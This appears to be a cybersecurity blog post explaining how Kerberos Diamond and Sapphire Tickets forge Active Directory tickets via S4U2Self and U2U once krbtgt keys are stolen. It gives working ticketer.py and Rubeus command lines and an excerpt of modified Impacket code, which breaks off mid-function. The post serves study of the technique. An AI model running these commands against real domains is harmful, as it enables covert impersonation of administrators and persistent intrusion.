<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Diamond And Sapphire Tickets" /><meta name="author" content="Peter Gabaldon" /><meta property="og:locale" content="en" /><meta name="description" content="Kerberos Diamond and Sapphire Tickets" /><meta property="og:description" content="Kerberos Diamond and Sapphire Tickets" /><link rel="canonical" href="https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/" /><meta property="og:url" content="https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/" /><meta property="og:site_name" content="Peter Gabaldon" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-10-14T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Diamond And Sapphire Tickets" /><meta name="twitter:site" content="@PedroGabaldon" /><meta name="twitter:creator" content="@Peter Gabaldon" /><meta name="google-site-verification" content="n4hbrMWNSEClBGstZ5tfJRPe9iWSPul3FA1_3mEJFgQ" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Peter Gabaldon"},"description":"Kerberos Diamond and Sapphire Tickets","url":"https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/","@type":"BlogPosting","headline":"Diamond And Sapphire Tickets","dateModified":"2023-01-16T19:30:28+01:00","datePublished":"2022-10-14T00:00:00+02:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/"},"@context":"https://schema.org"}</script><title>Diamond And Sapphire Tickets | Peter Gabaldon</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" href="/assets/css/post.css" as="style"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-N6LPQ2XQ6P"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-N6LPQ2XQ6P'); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/avatar/Peter_avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Peter Gabaldon</a></div><div class="site-subtitle font-italic">Cybersecurity blog.</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/tabs/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tabs/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/tabs/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/tabs/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/PeterGabaldon" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/PedroGabaldon" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Diamond And Sapphire Tickets</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><p>&nbsp;&nbsp;&nbsp;</p><a href="/posts/Diamond-Y-Sapphire-Tickets/" style="color: rgb(138,180,248)">🇪🇸 Español</a><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Diamond And Sapphire Tickets</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Fri, Oct 14, 2022, 12:00 AM +0200" > Oct 14, 2022 <i class="unloaded">2022-10-14T00:00:00+02:00</i> </span> by <span class="author"> Peter Gabaldon </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Mon, Jan 16, 2023, 7:30 PM +0100" > Jan 16, 2023 <i class="unloaded">2023-01-16T19:30:28+01:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="2143 words">11 min</span></div></div><div class="post-content"><h1 id="kerberos-diamond-and-sapphire-tickets">Kerberos Diamond and Sapphire Tickets</h1><p>As you may known, one of the approaches for persistence in a Windows Active Directory are the well-known techniques Golden Ticket and Silver Ticket. In the post-explotation phase, once you have enough privilege in a DC you could dump <em>ntds.dit</em> and get <em>krbtgt</em> Kerberos Keys. As you know, its Kerberos keys are used for encrypting TGTs and signing PAC. So, having them it is possible to craft any TGT and/or PAC. Having Kerberos keys of some SPN allows us to forge STs for that service.</p><p>The problem about Golden and Silver Tickets is that they are easily detectable. Once the KDC/service receives a TGT/ST it and logs are received in your SIEM it is easy to detect and alert that this TGT/ST was not actually created by the KDC. So, Monitoring Solutions will easy catch Golden and Silver Tickets.</p><h1 id="diamond-ticket">Diamond Ticket</h1><p>Andrew Schwartz at TrustedSec and Charlie Clark at Semperis (<a href="https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/">https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/</a>) invented a variation of Diamond PAC attack. The idea is simple, if you know <em>krbtgt</em> Kerberos keys just request any TGT and modify the PAC by demand (re-encrypting and re-signing it).</p><p>Ticketer and Rubeus can perform this attack.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ticketer.py <span class="nt">-request</span> <span class="nt">-domain</span> <span class="s1">'DOMAIN.FQDN'</span> <span class="nt">-user</span> <span class="s1">'domain_user'</span> <span class="nt">-password</span> <span class="s1">'password'</span> <span class="nt">-nthash</span> <span class="s1">'krbtgt/service NT hash'</span> <span class="nt">-aesKey</span> <span class="s1">'krbtgt/service AES key'</span> <span class="nt">-domain-sid</span> <span class="s1">'S-1-5-21-...'</span> <span class="nt">-user-id</span> <span class="s1">'1337'</span> <span class="nt">-groups</span> <span class="s1">'512,513,518,519,520'</span> <span class="s1">'baduser'</span>
</pre></table></code></div></div><pre><code class="language-cmd">Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS
</code></pre><p>This technique is more stealthy because te TGT is real, it was created by the KDC but only the PAC was modified. Although this approach is more stealthy it will be detected by monitoring solutions too.</p><h1 id="sapphire-ticket">Sapphire Ticket</h1><p>One brand new technique is Sapphire Ticket. Created by <a href="https://twitter.com/_nwodtuhs">Charlie Shutdown</a> this approach is more stealthy. You can create a TGT impersonating any user assembling real TGT and real PAC combining S4U2Self + U2U. This new technique attracted my attention and I wanted to study and show how it works under the hood.</p><p>He extended Ticketer from Impacket to add this attack.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>ticketer.py <span class="nt">-request</span> <span class="nt">-impersonate</span> <span class="s1">'domainadmin'</span> <span class="nt">-domain</span> <span class="s1">'DOMAIN.FQDN'</span> <span class="nt">-user</span> <span class="s1">'domain_user'</span> <span class="nt">-password</span> <span class="s1">'password'</span> <span class="nt">-aesKey</span> <span class="s1">'krbtgt AES key'</span> <span class="nt">-domain-sid</span> <span class="s1">'S-1-5-21-...'</span> <span class="s1">'ignored'</span>
</pre></table></code></div></div><p>Required arguments <em>-domain-sid</em> and (common) impersonate user param will be ignored.</p><h2 id="technical-details">Technical Details</h2><p>Sapphire Tickets technique is based in the S4U2Self + U2U trick. Using U2U is possible to request S4U2Self without having a SPN. S4U2Self is one of the messages in the S4U protocol extension. S4U2Self allows to obtainer a ticket in behalf of another user to itself. Imagine a service with Kerberos Constrained Delegation Enabled, but a user authenticates to it using NTLM. The Service cannot delegate the user to another service because it does not have the ST of the user. In that scenario, the service send to the KDC a KRB_TGS_REQ requesting a ST of that user to itself. So, the service now has a ST to itself with the user authentication information.</p><p>So the idea is: We request S4U2Self, getting ST to us as if the user has authenticated versus us. This ST has the user’s PAC. So, we have his PAC because we can decrypt it using <em>krbtgt</em> Kerberos keys. We can now modify the PAC of and existing TGT and re-encrypt and re-sign it with <em>krbtgt</em> Kerberos keys. The idea is that simple.</p><h2 id="u2u">U2U</h2><p>Imagine that a user wants to offer some service in his Desktop Machine. Because it is not a Server Machine we should presuppose that is more exposed to, for example, network attacks, not hardened, etc. We should consider it less secure definitly and can not contain a Service Key. Giving that scenario the Kerberos 5 specification brought a new idea. Basically, U2U goes about giving a user the possibility to host a service without actually being a service or having a principal, thus not having to responsability to store a long-lived master key. That way, the KDC is again responsible of storing “master” keys and the user can deliver its desired service. The idea is that two users could authenticate themselves and derive a common session key.</p><p>Let’s say there are two users: User A, acting as server, and User B, acting as client.</p><p>User A, the server, could give User B his TGT. Because User B does not know Kerberos Session Key of User A, he cannot impersonate User A in the realm actually. User B goes to the KDC and asks for U2U, givin both tickets, User A and User B tickets.</p><p>The KDC will generate a new session key, encrypt it twice, once with the session key of User A and the other one with the session key of User B. Finally, both users can use the newly generated session key decrypting it, each with its session key. That way, User A and User B had authenticated themselves and derived the new session key that they can use to provide confidentiality and/or integrity to whatever secure channel the will use. The User A does not expose any “master” credential in his desktop machine, only the short-lived session key.</p><p>A diagram about the process.</p><p><a href="../../assets/img/diamond-sapphire-tickets/u2u_1.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/u2u_1.png" alt="U2U-1" /></a></p><p><a href="../../assets/img/diamond-sapphire-tickets/u2u_2.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/u2u_2.png" alt="U2U-2" /></a></p><p><a href="../../assets/img/diamond-sapphire-tickets/u2u_3.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/u2u_3.png" alt="U2U-3" /></a></p><p><a href="../../assets/img/diamond-sapphire-tickets/u2u_4.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/u2u_4.png" alt="U2U-4" /></a></p><p>But this is the theory defined in Kerberos 5 protocol specification. Take a look at <a href="http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0001/kerberos/ref/kerberos-faq.html#u2uauth">http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0001/kerberos/ref/kerberos-faq.html#u2uauth</a>.</p><p><strong>To summarize</strong>, instead of specifying an SPN, we indicate the KDC to use the Session Key of a User. For that, we embed his TGT and spcify its Name in the Service Name.</p><h3 id="windows-implementation">Windows Implementation</h3><p>Finally, how is U2U implementad (at least) in Windows? I have not tested another implementations.</p><p><a href="../../assets/img/diamond-sapphire-tickets/windows_icon.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/windows_icon.png" alt="W-ICON" /></a></p><p>The implementation, as defined here <a href="https://datatracker.ietf.org/doc/html/draft-ietf-cat-user2user-01">https://datatracker.ietf.org/doc/html/draft-ietf-cat-user2user-01</a>, specifies that the option <strong>ENC-TKT-IN-SKEY</strong> has to be specified and an additional ticket has to be included in the TGS-REQ.</p><p>An example showing this at network level:</p><p><a href="../../assets/img/diamond-sapphire-tickets/prac4.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/prac4.png" alt="P4" /></a></p><p>We can take a look at the modified version of <em>ticketer.py</em> by <a href="https://twitter.com/_nwodtuhs">Charlie Shutdown</a>, to see how this option and the additional ticket is included.</p><p>Lines 491 and 507.</p><p><a href="https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L491">https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L491</a> <a href="https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L507">https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L507</a></p><h2 id="s4u2self">S4U2Self</h2><p>In the S4U Kerberos Extension, S4U2Self permits a service getting a Service Ticket to itself on behalf of the user. Basically, that is a Service Ticket as is the user would have authenticated to the service requesting S4U2Self. To request S4U2Self the account has to have at least one Service Principal Name.</p><p>Using <em>paDATA pA-FOR-USER</em> we can request S4U2Self.</p><h2 id="putting-all-together">Putting all together</h2><p>Thus, the idea is: we authenticate in the domain with any account, request S4U2Self, but, we are not a service (I mean, we do not have an SPN). At the Service Name we specify the user that we have use to authenticate, performing U2U. The result is that the KDC will generate a Service Ticket to us on behalft of the user. Now, we have the PAC of the target user :).</p><h2 id="practical-example">Practical Example</h2><p>We are at the post phase and we have The Kerberos (krbtgt) Keys.</p><p>Using <em>ticketer</em> like above we request a Sapphire Ticket.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>python3 ./ticketer.py <span class="nt">-request</span> <span class="nt">-impersonate</span> <span class="s1">'administrator'</span> <span class="nt">-domain</span> <span class="s1">'contoso.local'</span> <span class="nt">-user</span> <span class="s1">'emp.1'</span> <span class="nt">-password</span> <span class="s1">'1234'</span> <span class="nt">-aesKey</span> <span class="s1">'0c83d045c7428f2fee556ba0bbdf0109b3e39d38104b415fd91def363910b4b2'</span> <span class="nt">-domain-sid</span> <span class="s1">'S-1-5-21-877380313-3945528518-819751691'</span> <span class="s1">'ignored'</span>
</pre></table></code></div></div><p><a href="../../assets/img/diamond-sapphire-tickets/prac1.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/prac1.png" alt="P1" /></a></p><p>If we take a look at the ticket we can see that we have had a ticket that has the PAC of the request to impersonate, Administrator.</p><p><a href="../../assets/img/diamond-sapphire-tickets/prac2_1.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/prac2_1.png" alt="P2-1" /></a> <a href="../../assets/img/diamond-sapphire-tickets/prac2_2.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/prac2_2.png" alt="P2-3" /></a></p><p>But this ticket is “real”. For real I mean that we have not crafted the ticket totally offline. What happened under the hood is that we authenticated in the domain with the user <em>emp.1</em>.</p><p><a href="../../assets/img/diamond-sapphire-tickets/prac3.png" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/prac3.png" alt="P3" /></a></p><p>And later, in the S4U2Self+U2U we specified the username to get a service ticket for, <em>administr</em>ator<em>, plus we requested the service ticket for a user (to ourselves), performing *U2U</em>.</p><p>So the KDC gave us a Service Ticket encrypted with our Kerberos Key, <em>emp.1</em>. We can decrypt the ST, get the PAC. Then, in our TGT, modify the PAC with the administrator PAC we obtained before and re-encrypt and re-sign it. The adventage is that we crafted a TGT for the administrator user using previous “things” generated by the KDC.</p><p><a href="../../assets/img/diamond-sapphire-tickets/meme.jpeg" target="\_blank"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="../../assets/img/diamond-sapphire-tickets/meme.jpeg" alt="MEME" /></a></p><p>Looking at the <a href="https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L518">code</a> of <a href="https://twitter.com/_nwodtuhs">Charlie Shutdown</a> with his extension of <em>Ticketer</em>.</p><p>We can see how he extracts the PAC.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre><span class="p">[...]</span>
<span class="c1"># 1. S4U2Self + U2U
</span>            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'</span><span class="se">\t</span><span class="s">Requesting S4U2self+U2U to obtain %s</span><span class="se">\'</span><span class="s">s PAC'</span> <span class="o">%</span> <span class="bp">self</span><span class="p">.</span><span class="n">__options</span><span class="p">.</span><span class="n">impersonate</span><span class="p">)</span>
            <span class="n">tgs</span><span class="p">,</span> <span class="n">cipher</span><span class="p">,</span> <span class="n">oldSessionKey</span><span class="p">,</span> <span class="n">sessionKey</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">getKerberosS4U2SelfU2U</span><span class="p">()</span>

            <span class="c1"># 2. extract PAC
</span>            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'</span><span class="se">\t</span><span class="s">Decrypting ticket &amp; extracting PAC'</span><span class="p">)</span>
            <span class="n">decodedTicket</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">tgs</span><span class="p">,</span> <span class="n">asn1Spec</span><span class="o">=</span><span class="n">TGS_REP</span><span class="p">())[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">cipherText</span> <span class="o">=</span> <span class="n">decodedTicket</span><span class="p">[</span><span class="s">'ticket'</span><span class="p">][</span><span class="s">'enc-part'</span><span class="p">][</span><span class="s">'cipher'</span><span class="p">]</span>
            <span class="n">newCipher</span> <span class="o">=</span> <span class="n">_enctype_table</span><span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">decodedTicket</span><span class="p">[</span><span class="s">'ticket'</span><span class="p">][</span><span class="s">'enc-part'</span><span class="p">][</span><span class="s">'etype'</span><span class="p">])]</span>
            <span class="n">plainText</span> <span class="o">=</span> <span class="n">newCipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__tgt_session_key</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">cipherText</span><span class="p">)</span>
            <span class="n">encTicketPart</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">plainText</span><span class="p">,</span> <span class="n">asn1Spec</span><span class="o">=</span><span class="n">EncTicketPart</span><span class="p">())[</span><span class="mi">0</span><span class="p">]</span>
<span class="p">[...]</span>            
</pre></table></code></div></div><p>And that PAC of the TGT we already have is (almost) changed like always in <em>Ticketer</em> with the new PAC obtained from S4U2Self+U2U by updating <em>pacInfos</em>.</p><p>Additionally, some flags are always set: Forwadable, Proxiable, Renewable, Pre-Authent</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
</pre><td class="rouge-code"><pre><span class="p">[...]</span>
            <span class="c1"># 2. extract PAC
</span>            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'</span><span class="se">\t</span><span class="s">Decrypting ticket &amp; extracting PAC'</span><span class="p">)</span>
            <span class="n">decodedTicket</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">tgs</span><span class="p">,</span> <span class="n">asn1Spec</span><span class="o">=</span><span class="n">TGS_REP</span><span class="p">())[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">cipherText</span> <span class="o">=</span> <span class="n">decodedTicket</span><span class="p">[</span><span class="s">'ticket'</span><span class="p">][</span><span class="s">'enc-part'</span><span class="p">][</span><span class="s">'cipher'</span><span class="p">]</span>
            <span class="n">newCipher</span> <span class="o">=</span> <span class="n">_enctype_table</span><span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">decodedTicket</span><span class="p">[</span><span class="s">'ticket'</span><span class="p">][</span><span class="s">'enc-part'</span><span class="p">][</span><span class="s">'etype'</span><span class="p">])]</span>
            <span class="n">plainText</span> <span class="o">=</span> <span class="n">newCipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__tgt_session_key</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">cipherText</span><span class="p">)</span>
            <span class="n">encTicketPart</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">plainText</span><span class="p">,</span> <span class="n">asn1Spec</span><span class="o">=</span><span class="n">EncTicketPart</span><span class="p">())[</span><span class="mi">0</span><span class="p">]</span>

            <span class="c1"># Let's extend the ticket's validity a lil bit
</span>            <span class="c1"># I don't think this part should be left in the code. The whole point of doing a sapphire ticket is stealth, extending ticket duration is not the way to go
</span>            <span class="c1"># encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
</span>            <span class="c1"># encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
</span>
            <span class="c1"># Opening PAC
</span>            <span class="n">adIfRelevant</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authorization-data'</span><span class="p">][</span><span class="mi">0</span><span class="p">][</span><span class="s">'ad-data'</span><span class="p">],</span> <span class="n">asn1Spec</span><span class="o">=</span><span class="n">AD_IF_RELEVANT</span><span class="p">())[</span><span class="mi">0</span><span class="p">]</span>
